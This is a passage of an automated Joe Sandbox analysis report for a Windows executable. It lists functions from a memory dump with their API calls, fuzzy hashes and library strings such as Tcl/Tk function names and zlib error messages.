                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction ID: 2c39e7b62c8a66b456248d06f544c2e4d8643609d781c570979da2e3d2da2bd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7312C22A1C642C6E6517BA5A841A7CB650BB50F94FF10535EA6D033D2EFBCEC49C732
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                        • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                        • Instruction ID: ae4fbe4126699400f074f587ad2c33b4589cc4f19af0835a33385946e8f53c77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD21A331A08741CAEB64AFA4D4446FC73E0FB14718FB40A35E61D16AC5EF38D849C761
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction ID: 2018f3d165cfbb6e75aaeb171e427196baba683e2521475bf4e14ae6ebd5d0e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F114522A1D642C1EA617FA1B40097EE264BF45B84FF44031EB4C57A95EF7EDC44C762
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction ID: 649fee75d137b3dae6ac3cf5ea4774374cfbc4a93a35b9dd80ecfc624af3f2ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B021AA7261CA4186D7619F18E440779B7A4FB84B54FB84234D69D476D5EF3CDC08CB11
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction ID: 999ebc8f07484b07a83fc52c905d4b3eee2c0c8223fc55abd532e99a9a53f8a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D501A521A0C74180EA14EF93A945869E691FF85FE0FB84631DE6C17BDAEE3CD845C315
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF78DA60D00,?,?,?,00007FF78DA6236A,?,?,?,?,?,00007FF78DA63B59), ref: 00007FF78DA6D6AA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: AllocHeap
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
Strings
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
APIs
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
APIs
• _get_daylight.LIBCMT ref: 00007FF78DA75CB5
  • Part of subcall function 00007FF78DA75608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7561C
  • Part of subcall function 00007FF78DA6A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
  • Part of subcall function 00007FF78DA6A9B8: GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
  • Part of subcall function 00007FF78DA6A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF78DA6A94F,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6A979
  • Part of subcall function 00007FF78DA6A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF78DA6A94F,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6A99E
• _get_daylight.LIBCMT ref: 00007FF78DA75CA4
  • Part of subcall function 00007FF78DA75668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7567C
• _get_daylight.LIBCMT ref: 00007FF78DA75F1A
• _get_daylight.LIBCMT ref: 00007FF78DA75F2B
• _get_daylight.LIBCMT ref: 00007FF78DA75F3C
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78DA7617C), ref: 00007FF78DA75F63
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
APIs
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
APIs
• _get_daylight.LIBCMT ref: 00007FF78DA75F1A
  • Part of subcall function 00007FF78DA75668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7567C
• _get_daylight.LIBCMT ref: 00007FF78DA75F2B
  • Part of subcall function 00007FF78DA75608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7561C
• _get_daylight.LIBCMT ref: 00007FF78DA75F3C
  • Part of subcall function 00007FF78DA75638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7564C
  • Part of subcall function 00007FF78DA6A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
  • Part of subcall function 00007FF78DA6A9B8: GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78DA7617C), ref: 00007FF78DA75F63
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
APIs
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                        • API String ID: 0-1127688429
                                                                                                                                                                                                                                        • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                        • Instruction ID: 849c8b57624331b01c8131944dec6a2fd84527bff38ca56907daa40ff57d8506
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4F1A362B0C2D68AE795AF158088F3ABAB9FF44744F764138DA4987390EB38EC44C751
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                        • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                        • Instruction ID: 8817dd7386b36dc68a497dbf377de1813ced7801b2b5c1831d9a6151d9c6f7ea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFB1A073A09B858BEB15CF29C44676C77E0F784B48F248822DB9D837A4DB39D855C711
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                                                                                        • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                        • Instruction ID: 19c9064343c1ab4556a3f1c8c8a7ceccb38be5c46be0971ff24c95a84bbfd161
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49E1C63A90C642C5EB68AE55A05093DB3A0FF45B48FB84535DA4E036D4EF2ADC4BC712
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                        • API String ID: 0-900081337
                                                                                                                                                                                                                                        • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                        • Instruction ID: 52bc5df55bb1ddff33e2093f64100d885bfd43fca29f19e67bb84d50666a6964
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D891C572A1C28687E7A49E55C448F3E7AB9FB44354F714139DA4A867C0EB3CED44CB12
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                        • API String ID: 0-3030954782
                                                                                                                                                                                                                                        • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                        • Instruction ID: 7ed6c8ffc3643cd78794621b8fe7ee0693c1bf3b2e1750e003330617e18c99dd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6517C22B1C2C186EB249E75A800B79A791F744B94FB9C231CB5847AC5EF3DD949C712
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID:
• String ID: gfffffff
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
APIs
Similarity
• API ID: HeapProcess
• String ID:
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                        • Instruction ID: 724b8a96771a33184dcfc799eca2744ab5c8d1dac0433f64b0794c78452ae271
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0981F472A0C28186DB74DB59B440B7AAA91FB45794FB08235DB9D43B84EF3CDA08CB11
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
